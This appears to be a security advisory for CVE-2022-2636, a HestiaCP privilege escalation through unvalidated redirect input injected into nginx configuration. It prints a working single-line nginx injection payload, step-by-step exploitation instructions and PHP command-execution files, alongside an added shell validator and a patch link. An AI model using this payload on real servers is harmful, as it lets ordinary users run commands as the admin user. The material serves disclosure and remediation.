CVE-2022-2636 HestiaCP Privilege Escalation Nginx Conf Priv Esc
Privilege Escalation
HestiaCP <= 1.6.5 is vulnerable to privilege escalation. The redirect target entered on the “Edit Web Domain” page (the v-redirect-custom input, handled at v-add-web-domain-redirect#L82) is not validated: the value is written verbatim into /home/user/conf/web/domain.com/nginx.conf_redirect, and that file is included from /home/user/conf/web/domain.com/nginx.conf. A user who owns a web domain can therefore inject arbitrary nginx directives into the server block for that domain. The PoC below uses this to route a PHP file of the user's choosing through another PHP-FPM pool and run commands as the admin user; a malformed injection simply breaks the configuration and takes the nginx server down.
/home/user/conf/web/domain.com/nginx.conf (excerpt; in the PoC environment the user is test and the domain is poc.com, hence the include path):
    ...
    location ~ /\.(?!well-known\/|file) {
        deny all;
        return 404;
    }
    include /home/test/conf/web/poc.com/nginx.conf_*;
    }
/home/user/conf/web/domain.com/nginx.conf_redirect before the payload (input: asd):
    if ($host != "asd") {
        return 301 $scheme://asd$request_uri;
    }
/home/user/conf/web/domain.com/nginx.conf_redirect after the payload. The input lands in two places, inside the quoted $host comparison and in the return target. In the first, the double quote in the payload ends the string, the following ") {}" completes the original if with an empty body, the injected location block then sits directly in the server block, and the trailing "if ( $host = false ) { #" opens a block that is never entered and comments out the rest of the template line. In the second, everything after the first ";" is a comment, and the template's final "}" now closes that dummy if block, so the file still parses:
    if ($host != "redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #") {
    return 301 $scheme://redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #$request_uri;
    }
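To make the write path concrete, here is an added example (my own shell script, not HestiaCP's v-add-web-domain-redirect and not the upstream fix) that renders the redirect fragment the way the advisory shows it being produced, then puts the kind of allow-list check in front of it that the script lacked. The function names render_redirect_fragment, is_redirect_target_valid and add_web_domain_redirect, the hostname regex and the sample targets are my own assumptions; the payload string is the one from this advisory, with its placeholders left in.

```shell
#!/bin/sh
# Added example, not HestiaCP code and not the upstream patch: it models how the
# redirect target ends up in nginx.conf_redirect and shows a validation step
# that would have stopped the breakout. Function names, the allow-list regex
# and the sample targets are assumptions; the payload is the advisory's.

# The advisory's payload, placeholders left as on the page. Built by
# concatenation only so the lines stay short; the value is one line.
p='redStar$request_uri; ## " ) {} location /adminShell.php { '
p="$p"'alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; '
p="$p"'fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;'
p="$p"'fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } '
p="$p"'if ( $host = false ) { #'
INJECTED_PAYLOAD=$p

# The vulnerable write path as the advisory describes it: the target is
# interpolated straight into the template, once inside a quoted string and
# once into the return target, with no escaping or checking.
render_redirect_fragment() {
    printf 'if ($host != "%s") {\n    return 301 $scheme://%s$request_uri;\n}\n' "$1" "$1"
}

# Check a redirect target before it is written. Accepts a dotted hostname,
# optionally with an http(s) scheme, port and path, and nothing else.
# Returns 0 when valid, 1 when not.
is_redirect_target_valid() {
    target=$1
    # A second line would let the allow-list below pass on the first line
    # and still write the second one into the config.
    nl='
'
    case $target in *"$nl"*) return 1 ;; esac
    # Deny-list of the characters that make the breakout above possible:
    # $ " ; { } # and whitespace. Redundant with the allow-list, but it
    # names the actual hazard for anyone reading the script.
    if printf '%s' "$target" | grep -q '[$";{}#[:space:]]'; then
        return 1
    fi
    # Allow-list: optional scheme, hostname labels, optional port and path.
    printf '%s' "$target" | grep -Eq \
        '^(https?://)?([A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}(:[0-9]{1,5})?(/[A-Za-z0-9._~/-]*)?$'
}

# The write path with the check in front of it: emits the fragment for a
# valid target, refuses with exit status 2 otherwise.
add_web_domain_redirect() {
    if is_redirect_target_valid "$1"; then
        render_redirect_fragment "$1"
    else
        printf 'Error: invalid redirect target\n' >&2
        return 2
    fi
}

# Demo: the unchecked writer embeds the payload verbatim, the checked one
# refuses it and still accepts an ordinary target.
render_redirect_fragment "$INJECTED_PAYLOAD"
add_web_domain_redirect "$INJECTED_PAYLOAD" || echo "rejected with status $?"
add_web_domain_redirect 'https://example.com/'
```

The deny-list is only there to make the hazard readable; the allow-list alone enforces the format, and it is stricter than the page's own test input (a bare "asd" without a dot is rejected). Escaping the value instead of rejecting it would not be enough here, because the same input is also used unquoted in the return target.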
PoC
- Payload (must be a single line; replace [FULLPATHINFO] and [HOSTNAME] with the values collected in the steps below, and adjust the php8.0 part of the socket name if the server runs a different PHP-FPM version):
redStar$request_uri; ## " ) {} location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } if ( $host = false ) { #
- Log in as an ordinary user.
- Create a domain in the dashboard.
- Open Files in the top bar.
- In the domain's public_html folder, create a PHP file with the contents below, open it in a browser, and use the printed path and hostname to fill in [FULLPATHINFO] and [HOSTNAME] in the payload.
x.php:
    <?php echo getcwd(); echo "<br>"; system("hostname");
- Open the “Edit Web Domain” page in the dashboard, select “Enable domain redirection”, then “Redirect visitors to a custom domain or web address”, paste the payload into the text box and click Save.
- Back in public_html, create a PHP file named adminShell.php:
    <?php system("id; whoami;");
- Visit /adminShell.php in the browser. The injected location block hands the request to the PHP-FPM pool behind php8.0-fpm-[HOSTNAME].sock, so the commands run as the admin user rather than as the logged-in user.
PoC Video
Patch Commit
https://github.com/hestiacp/hestiacp/commit/b178b9719bb2c98cf8a6db70065086f596afad81